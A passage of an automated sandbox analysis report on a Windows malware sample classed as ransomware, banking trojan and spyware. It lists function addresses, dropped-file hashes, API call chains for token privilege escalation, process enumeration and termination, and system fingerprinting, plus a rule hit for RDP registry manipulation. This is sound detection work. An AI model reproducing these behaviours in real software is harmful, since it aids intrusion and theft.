                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C69F32A9_2_6C69F32A
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6D93C99_2_6C6D93C9
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C66A3869_2_6C66A386
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C69C38C9_2_6C69C38C
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_032FE0519_2_032FE051
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_033363589_2_03336358
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_033003849_2_03300384
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_033022949_2_03302294
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_0330D1249_2_0330D124
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_0333A16D9_2_0333A16D
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_033011949_2_03301194
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_0333E07A9_2_0333E07A
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_033080B49_2_033080B4
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_033590E89_2_033590E8
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_033437A49_2_033437A4
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_033417A69_2_033417A6
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_033066F49_2_033066F4
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_0333A6EF9_2_0333A6EF
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_0333A4349_2_0333A434
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_033204749_2_03320474
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_032FF4449_2_032FF444
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_033314C49_2_033314C4
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_03339B519_2_03339B51
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_0335ABE19_2_0335ABE1
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_03339AA49_2_03339AA4
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_03305AC49_2_03305AC4
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_0335E9229_2_0335E922
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_033339C49_2_033339C4
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_033028149_2_03302814
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_033008749_2_03300874
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_033518EE9_2_033518EE
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_0333DE469_2_0333DE46
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_03302EA49_2_03302EA4
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_03339EC39_2_03339EC3
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_0335AD059_2_0335AD05
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_0333DC129_2_0333DC12
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_03300CE49_2_03300CE4
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_1000F1009_2_1000F100
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_100400569_2_10040056
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_1000A0909_2_1000A090
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_1005B0C49_2_1005B0C4
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_1003C1499_2_1003C149
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_100031709_2_10003170
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_100042709_2_10004270
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_100383349_2_10038334
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_100023609_2_10002360
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_1003C4109_2_1003C410
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_100014209_2_10001420
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_100224509_2_10022450
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_100334A09_2_100334A0
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_1003C6CB9_2_1003C6CB
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_100086D09_2_100086D0
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_100457809_2_10045780
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_100437829_2_10043782
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_100047F09_2_100047F0
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_100028509_2_10002850
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_100538CA9_2_100538CA
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_100608FE9_2_100608FE
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_100359A09_2_100359A0
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_1003BA809_2_1003BA80
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_10007AA09_2_10007AA0
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_1003BB2D9_2_1003BB2D
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_1005CBBD9_2_1005CBBD
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_1003FBEE9_2_1003FBEE
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_10002CC09_2_10002CC0
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_1005CCE19_2_1005CCE1
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_1003FE229_2_1003FE22
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_10004E809_2_10004E80
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_1003BE9F9_2_1003BE9F
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C67583510_2_6C675835
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C63111210_2_6C631112
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C639CCA10_2_6C639CCA
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C6B9CC510_2_6C6B9CC5
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C6D1CD110_2_6C6D1CD1
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C699D7B10_2_6C699D7B
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C6ABD4810_2_6C6ABD48
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C6C6D4610_2_6C6C6D46
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C64CD3210_2_6C64CD32
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C6C1D1210_2_6C6C1D12
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C68EDF510_2_6C68EDF5
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C67BDD010_2_6C67BDD0
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C68DD8F10_2_6C68DD8F
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C6D8E6E10_2_6C6D8E6E
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C638E6010_2_6C638E60
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C6A3E4C10_2_6C6A3E4C
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C6A9E1210_2_6C6A9E12
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C64AED710_2_6C64AED7
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C6C7F3710_2_6C6C7F37
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C64DF3F10_2_6C64DF3F
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C64BFD710_2_6C64BFD7
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C64387C10_2_6C64387C
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C65697310_2_6C656973
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C6D193310_2_6C6D1933
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C6B99C610_2_6C6B99C6
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C6BB9D710_2_6C6BB9D7
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C6709DA10_2_6C6709DA
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C6B599010_2_6C6B5990
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C6BCAA510_2_6C6BCAA5
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C63EBF410_2_6C63EBF4
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C6A0BCC10_2_6C6A0BCC
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C647BAA10_2_6C647BAA
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C645BBD10_2_6C645BBD
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C63B41A10_2_6C63B41A
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C6D248B10_2_6C6D248B
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C6D149E10_2_6C6D149E
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C64454410_2_6C644544
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C6CB50310_2_6C6CB503
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C67B5D710_2_6C67B5D7
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C6605B310_2_6C6605B3
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C6AF6C910_2_6C6AF6C9
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C6A86B710_2_6C6A86B7
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C67868910_2_6C678689
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C6A469810_2_6C6A4698
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C64569810_2_6C645698
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C67D76810_2_6C67D768
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C6B974B10_2_6C6B974B
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C6C67F510_2_6C6C67F5
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C69B07C10_2_6C69B07C
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C6A202510_2_6C6A2025
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C6A700310_2_6C6A7003
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C65E0D810_2_6C65E0D8
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C6D20A310_2_6C6D20A3
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C63E1C810_2_6C63E1C8
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C68A19210_2_6C68A192
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C6B026A10_2_6C6B026A
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C69326610_2_6C693266
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C63827910_2_6C638279
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C6962E810_2_6C6962E8
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C6D42E110_2_6C6D42E1
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C6C62A610_2_6C6C62A6
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C6482B210_2_6C6482B2
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C6A836810_2_6C6A8368
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C63637410_2_6C636374
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C69E35C10_2_6C69E35C
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C69F32A10_2_6C69F32A
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C6D93C910_2_6C6D93C9
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C66A38610_2_6C66A386
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C69C38C10_2_6C69C38C
                Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\6fjdie\DAPIjX8.exe E528455778D952ACFC5B330B378F2C53CC92E55CFEAB1C1E1DBB52E01D626BB4
                Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\6fjdie\MSVCP140.dll 885A0A146A83B0D5A19B88C4EB6372B648CFAED817BD31D8CD3FB91313DEA13D
                Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\6fjdie\VCRUNTIME140.dll F10727074BCB4375F276E48DA64029D370299768536157321FB4BD9B1997B898
                Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\6fjdie\libcef.dll DCD188D383CB6347BFED0F4E6209ABD579526E729B003C31C3A8B117C1475AF6
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: String function: 00641D20 appears 40 times
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: String function: 00641A4F appears 106 times
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: String function: 006389E3 appears 38 times
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: String function: 6C6B7ECE appears 72 times
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: String function: 6C6B9165 appears 42 times
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: String function: 6C6B3864 appears 346 times
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: String function: 6C63C822 appears 40 times
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: String function: 6C6B1F84 appears 938 times
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: String function: 6C6514FC appears 136 times
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: String function: 6C63CB4D appears 878 times
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: String function: 10039AC0 appears 60 times
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: String function: 6C6B7820 appears 148 times
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: String function: 03337AE4 appears 58 times
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: String function: 6C6C9148 appears 46 times
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: String function: 6C652962 appears 66 times
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: String function: 6C6B23D3 appears 38 times
                Source: pXm5oVO3Go.exe, 00000000.00000000.1390795911.0000000000741000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameJumpLogin.exe( vs pXm5oVO3Go.exe
                Source: pXm5oVO3Go.exe, 00000000.00000003.2446378352.0000000003A48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs pXm5oVO3Go.exe
                Source: pXm5oVO3Go.exe, 00000000.00000002.2608012130.0000000000877000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUplayCrashReporter.exe@ vs pXm5oVO3Go.exe
                Source: pXm5oVO3Go.exe, 00000000.00000002.2608012130.0000000000877000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUplayCrashReportero\ vs pXm5oVO3Go.exe
                Source: pXm5oVO3Go.exe, 00000000.00000003.2443786424.0000000003A41000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcp140.dllT vs pXm5oVO3Go.exe
                Source: pXm5oVO3Go.exe, 00000000.00000002.2609492945.0000000003A48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs pXm5oVO3Go.exe
                Source: pXm5oVO3Go.exe, 00000000.00000002.2608654376.0000000000D40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs pXm5oVO3Go.exe
                Source: pXm5oVO3Go.exeBinary or memory string: OriginalFilenameJumpLogin.exe( vs pXm5oVO3Go.exe
                Source: pXm5oVO3Go.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 9.2.DAPIjX8.exe.32fec24.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_RDP author = ditekSHen, description = Detects executables embedding registry key / value combination manipulating RDP / Terminal Services
                Source: 9.2.DAPIjX8.exe.31d9c24.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_RDP author = ditekSHen, description = Detects executables embedding registry key / value combination manipulating RDP / Terminal Services
                Source: 9.2.DAPIjX8.exe.31d9c24.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_RDP author = ditekSHen, description = Detects executables embedding registry key / value combination manipulating RDP / Terminal Services
                Source: 9.2.DAPIjX8.exe.32fec24.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_RDP author = ditekSHen, description = Detects executables embedding registry key / value combination manipulating RDP / Terminal Services
                Source: classification engineClassification label: mal100.rans.bank.troj.spyw.evad.winEXE@6/8@3/3
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_03317F74 GetProcessHeap,RtlAllocateHeap,VirtualAlloc,VirtualAlloc,VirtualFree,VirtualProtect,GetLastError,FormatMessageW,LocalAlloc,OutputDebugStringA,9_2_03317F74
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_036418EE OpenProcess,OpenProcessToken,CloseHandle,AdjustTokenPrivileges,GetLengthSid,SetTokenInformation,OpenProcess,OpenProcessToken,CloseHandle,AdjustTokenPrivileges,GetLengthSid,SetTokenInformation,OpenProcess,OpenProcessToken,CloseHandle,AdjustTokenPrivileges,GetLengthSid,SetTokenInformation,OpenProcess,OpenProcessToken,CloseHandle,AdjustTokenPrivileges,GetLengthSid,SetTokenInformation,0_2_036418EE
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_036418A4 AdjustTokenPrivileges,0_2_036418A4
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_03641776 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,CloseHandle,AdjustTokenPrivileges,0_2_03641776
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_100018A0 AdjustTokenPrivileges,0_2_100018A0
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_100018EA OpenProcess,OpenProcessToken,CloseHandle,AdjustTokenPrivileges,GetLengthSid,SetTokenInformation,OpenProcess,OpenProcessToken,CloseHandle,AdjustTokenPrivileges,GetLengthSid,SetTokenInformation,OpenProcess,OpenProcessToken,CloseHandle,AdjustTokenPrivileges,GetLengthSid,SetTokenInformation,OpenProcess,OpenProcessToken,CloseHandle,AdjustTokenPrivileges,GetLengthSid,SetTokenInformation,0_2_100018EA
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_10001772 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,CloseHandle,AdjustTokenPrivileges,0_2_10001772
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_03325554 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CreateToolhelp32Snapshot,LocalAlloc,Process32First,OpenProcess,K32EnumProcessModules,K32GetProcessImageFileNameA,lstrcpy,lstrcat,OpenProcessToken,GetTokenInformation,GlobalAlloc,GetTokenInformation,LookupAccountSidA,LookupAccountSidA,lstrcpy,GlobalFree,CloseHandle,lstrcpy,lstrlen,lstrlen,LocalSize,LocalReAlloc,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,K32GetProcessMemoryInfo,lstrcpy,CreateFileA,GetFileSize,CloseHandle,CloseHandle,Process32Next,LocalReAlloc,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,9_2_03325554
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_03325FC4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,OpenProcess,K32GetProcessImageFileNameA,CloseHandle,OpenProcess,TerminateProcess,lstrlen,Sleep,DeleteFileA,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,Sleep,EnumWindows,9_2_03325FC4
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_10027530 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CreateToolhelp32Snapshot,LocalAlloc,Process32First,OpenProcess,K32EnumProcessModules,K32GetProcessImageFileNameA,lstrcpy,lstrcat,OpenProcessToken,GetTokenInformation,GlobalAlloc,GetTokenInformation,LookupAccountSidA,LookupAccountSidA,lstrcpy,GlobalFree,CloseHandle,lstrcpy,lstrlen,lstrlen,LocalSize,LocalReAlloc,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,K32GetProcessMemoryInfo,lstrcpy,CreateFileA,GetFileSize,CloseHandle,CloseHandle,Process32Next,LocalReAlloc,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,9_2_10027530
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_10027FA0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,OpenProcess,K32GetProcessImageFileNameA,CloseHandle,OpenProcess,TerminateProcess,lstrlen,Sleep,DeleteFileA,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,Sleep,EnumWindows,9_2_10027FA0
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_033314C4 RegOpenKeyExA,RegCloseKey,GetTickCount,gethostname,GetUserNameA,GetLastError,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,lstrcpy,lstrlen,OpenSCManagerA,wsprintfA,OpenServiceA,QueryServiceStatus,wsprintfA,lstrlen,GetModuleFileNameA,SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,EnumDisplaySettingsA,_strftime,OpenSCManagerA,QueryServiceStatus,OpenSCManagerA,QueryServiceStatus,GetLocaleInfoW,WideCharToMultiByte,WideCharToMultiByte,9_2_033314C4
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_00428B10 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,0_2_00428B10
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6923D0 CoCreateInstance,GetModuleFileNameA,_sprintf,_sprintf,_sprintf,MultiByteToWideChar,9_2_6C6923D0
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_005390CF __EH_prolog3_catch,FindResourceW,LoadResource,LockResource,GetDesktopWindow,IsWindowEnabled,EnableWindow,EnableWindow,GetActiveWindow,SetActiveWindow,FreeResource,0_2_005390CF
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_03328A82 StartServiceA,CloseServiceHandle,CloseServiceHandle,Sleep,lstrlen,LocalSize,lstrlen,LocalReAlloc,lstrlen,lstrlen,lstrlen,LocalFree,9_2_03328A82
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeFile created: C:\Program Files (x86)\6fjdieJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\long[1].bmpJump to behavior
                Source: C:\Windows\System32\OpenWith.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7576:120:WilError_03
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeMutant created: \Sessions\1\BaseNamedObjects\MyProgramMutex
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeMutant created: \Sessions\1\BaseNamedObjects\4246/:/49"7<53
                Source: pXm5oVO3Go.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: pXm5oVO3Go.exeReversingLabs: Detection: 15%
                Source: pXm5oVO3Go.exeVirustotal: Detection: 17%
                Source: DAPIjX8.exeString found in binary or memory: <!--StartFragment -->
                Source: DAPIjX8.exeString found in binary or memory: <!--StartFragment -->
                Source: DAPIjX8.exeString found in binary or memory: <!--StartFragment -->
                Source: DAPIjX8.exeString found in binary or memory: <!--StartFragment -->
                Source: pXm5oVO3Go.exeString found in binary or memory: AddDllDirectory\/LoadLibraryExAkernel32multi Rh
                Source: pXm5oVO3Go.exeString found in binary or memory: set-addPolicy
                Source: pXm5oVO3Go.exeString found in binary or memory: id-cmc-addExtensions
                Source: unknownProcess created: C:\Users\user\Desktop\pXm5oVO3Go.exe "C:\Users\user\Desktop\pXm5oVO3Go.exe"
                Source: unknownProcess created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeProcess created: C:\Program Files (x86)\6fjdie\DAPIjX8.exe "C:\Program Files (x86)\6fjdie\DAPIjX8.exe"
                Source: unknownProcess created: C:\Program Files (x86)\6fjdie\DAPIjX8.exe "C:\Program Files (x86)\6fjdie\DAPIjX8.exe"
                Source: unknownProcess created: C:\Program Files (x86)\6fjdie\DAPIjX8.exe "C:\Program Files (x86)\6fjdie\DAPIjX8.exe"
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeProcess created: C:\Program Files (x86)\6fjdie\DAPIjX8.exe "C:\Program Files (x86)\6fjdie\DAPIjX8.exe" Jump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: msimg32.dllJump to behavior
